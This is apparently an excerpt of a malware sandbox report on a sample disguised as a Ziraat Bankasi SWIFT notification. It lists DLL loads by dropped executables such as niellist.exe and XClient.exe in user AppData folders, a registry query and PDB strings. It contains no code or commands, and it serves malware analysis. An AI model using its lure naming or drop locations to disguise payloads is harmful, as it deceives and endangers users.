Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtctm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcprx.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtclog.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: xolehlp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: comres.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcvsp1res.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxoci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: oci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Locator.exe	Section loaded: ntmarta.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static file information: File size 2007552 > 1048576

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253422637.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbL source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000013.00000002.1452607862.0000000003085000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2007802565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000013.00000002.1440773629.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1671146289.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
